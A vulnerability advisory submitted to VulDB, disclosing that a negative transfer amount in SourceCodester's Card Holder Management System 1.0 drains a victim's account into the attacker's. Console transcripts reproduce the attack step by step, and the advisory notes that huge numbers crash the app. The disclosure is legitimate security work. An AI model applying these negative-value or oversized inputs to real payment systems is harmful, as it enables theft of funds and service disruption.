| Title | Improper Input Sanitization leading to Arbitrary Money Transfer in Card Holder Management System |
|---|
| Description |
## Summary
An attacker can supply a negative number to the transfer field in Card Holder Management System version 1.0. This results in money being drained from the target account and added to the attacker account.
## Risk Rating
- Risk: **HIGH**
- Exploitation Difficulty: **LOW**
## CVSS Justification
### Network
The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). This software is intended to be remotely accessible.
### Low
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
### None
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the the vulnerable system to carry out an attack. This attack requires a user account, but there are no restrictions on account creation.
### None
The vulnerable system can be exploited without interaction from any user.
### Unchanged
An exploited vulnerability can only affect resources managed by the same security authority.
### None
There is no loss of confidentiality within the impacted component.
### High
The loss of data integrity proves a high threat to the component, and affects a core part of it service.
### Low
Performance is reduced or there are interruptions in resource availability. Supplying "99999999999999999999999999999999999999999999999999999" or other large numbers will crash the system. Additionally, the removal of money will impact the performance of the users.
## Steps to reproduce
Create two user accounts:
```
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 1
Your card has been created
Your card number:
4000004512837604
Your card PIN:
7620
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 1
Your card has been created
Your card number:
4000001250478633
Your card PIN:
5402
```
Log into account 1 and add $10000.
```
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 1
Your card has been created
Your card number:
4000001250478633
Your card PIN:
5402
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 2
Enter your card number:
4000004512837604
Enter your PIN:
7620
You have successfully logged in!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 2
Enter Money:
10000
Money was added!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 1
Balance: 10000
```
Log out of account 1 and log into account 2 and initiate the malicious transfer.
```
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 5
You have successfully logged out!
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 2
Enter your card number:
4000001250478633
Enter your PIN:
5402
You have successfully logged in!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 3
Enter card number:
4000004512837604
Enter how much money you want to transfer:
-10000
Success!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 1
Balance: 10000
```
Log out of account 2 and log into account 1 to verify the funds are gone from account 1.
```
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 5
You have successfully logged out!
======== Card Holder Management System ========
1. Create New Account(Auto Generate)
2. User Account
0. Exit
Enter your choice: 2
Enter your card number:
4000004512837604
Enter your PIN:
7620
You have successfully logged in!
####### Card Holder Management System #######
1.Balance
2.Add Money
3.Transfer money
4.Close account
5.Log out
0.Exit
Enter your choice: 1
Balance: 0
```
## Affected Demographic/User Base
The users of this system for their account management are at risk of their funds being removed from their accounts without their knowledge.
## Recommended Fix
Add validation to the transfer amount.
## References
https://www.sourcecodester.com/python/16750/card-holder-management-system-python-free-source-code.html
## Notes
For the issued CVE ID, please credit Michael Blunt as the discovering researcher.
List contact email as [email protected].
The author of this project has been contacted and this information has been shared.
## Impact
### Attack Scenario
An attacker can arbitrarily transfer funds out of an account and into their own by specifying a negative transfer amount. |
|---|
| Source | ⚠️ https://www.sourcecodester.com/python/16750/card-holder-management-system-python-free-source-code.html |
|---|
| User | mikel22 (UID 51822) |
|---|
| Submission | 08/09/2023 18:46 (3 years ago) |
|---|
| Moderation | 08/20/2023 08:54 (11 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 237560 [SourceCodester Card Holder Management System 1.0 Minus Value improper validation of specified quantity in input] |
|---|
| Points | 20 |
|---|